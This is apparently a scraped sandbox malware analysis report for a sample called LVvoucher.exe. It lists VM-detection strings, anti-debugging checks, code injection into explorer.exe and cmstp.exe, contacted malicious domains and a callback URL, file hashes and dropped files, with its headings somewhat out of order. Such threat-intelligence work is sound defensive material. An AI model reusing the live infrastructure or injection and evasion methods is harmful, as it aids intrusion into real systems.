Source: explorer.exe, 00000012.00000000.373943190.000000000EF31000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ackagesg#
Source: explorer.exe, 00000012.00000000.371753438.00000000086C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000012.00000000.383167189.00000000067C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.383167189.00000000067C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000012.00000000.373943190.000000000EF31000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}soft.Wif$
Source: explorer.exe, 00000012.00000000.371753438.00000000086C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: LVvoucher.exe, 00000000.00000002.359603340.000000000306C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\LVvoucher.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\LVvoucher.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\LVvoucher.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Windows Analysis Report LVvoucher.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
LVvoucher.exe

Source: C:\Users\user\Desktop\LVvoucher.exe	Thread register set: target process: 3352			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Thread register set: target process: 3352			Jump to behavior

Source: explorer.exe, 00000012.00000000.396776984.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.482088727.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.379656638.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.363670877.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000012.00000000.396516307.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.480695531.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.362826309.0000000000B68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 00000012.00000000.396776984.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.482088727.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.379656638.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.363670877.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.367363243.0000000005E10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000012.00000000.396776984.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.482088727.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.379656638.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.363670877.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000012.00000000.396776984.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.482088727.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.379656638.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.363670877.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000012.00000000.371942866.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.385575613.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.404762530.0000000008778000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndh

Name	IP	Active
sistemaparadrogaria.com	162.214.116.198	true
www.sistemaparadrogaria.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.sistemaparadrogaria.com/oh75/?FXYX=6lNHWfL8rfDPMNDP&q6eTdZlX=iOacuv//8nkeO8ddqiM7nG4ecSv6NmMEEJfIiPKVhzCjN03xI/UIDvMzPThYvy/caBBR	true	Avira URL Cloud: safe	unknown
www.wwwccsuresults.com/oh75/	true	Avira URL Cloud: malware	low

ID:	562062
Product:	CloudBasic
Start time:	11:13:28
Start date:	28.01.2022
Sample:	LVvoucher.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	4f2cf362036af705349843df3419ae5d
SHA1:	49dfd4b26e8c9f2cc76df24c55e6616f438bf422
SHA256:	77604e2646be4fb59a16e33ca5e78a73ec5045b8f1cce6f5ba16c11304b1c2ee
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LVvoucher.exe.log	ASCII text, with CRLF line terminators	FED34146BF2F2FA59DCF8702FCC8232E	B03BFEA175989D989850CF06FE5E7BBF56EAA00A	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	911D78F2B033EEF2E2E2C12FED70FC14	ADCB92410722F32FD0C7654D42FC1171565EBD70	79F09F46DFFCE5EC0C071177D80D272683C8803241EB8605146733166DC261E3
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffzk4tyu.4w0.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mapuveur.30z.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\tmp57C7.tmp	XML 1.0 document, ASCII text	BB8F59C4A1E27161E1EC045BE1278D62	C541FA16BB2881116EC3E5652A6F70BDE836616A	B49B702001D8C140D46871B29017142C0372A7787579162FBDD73C572C9C96CD
C:\Users\user\AppData\Roaming\UcgxBJ.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	4F2CF362036AF705349843DF3419AE5D	49DFD4B26E8C9F2CC76DF24C55E6616F438BF422	77604E2646BE4FB59A16E33CA5E78A73EC5045B8F1CCE6F5BA16C11304B1C2EE
C:\Users\user\AppData\Roaming\UcgxBJ.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Documents\20220128\PowerShell_transcript.841675.8VIZzBhA.20220128111447.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	CD339289901E188CA39B1EF25DF86E73	131AC882D948C8438277902CE6AE0B63803FB7B5	0888B264DE6BAC861358EE44A5EE35D3259895637D889160DB7E3DA12416EF25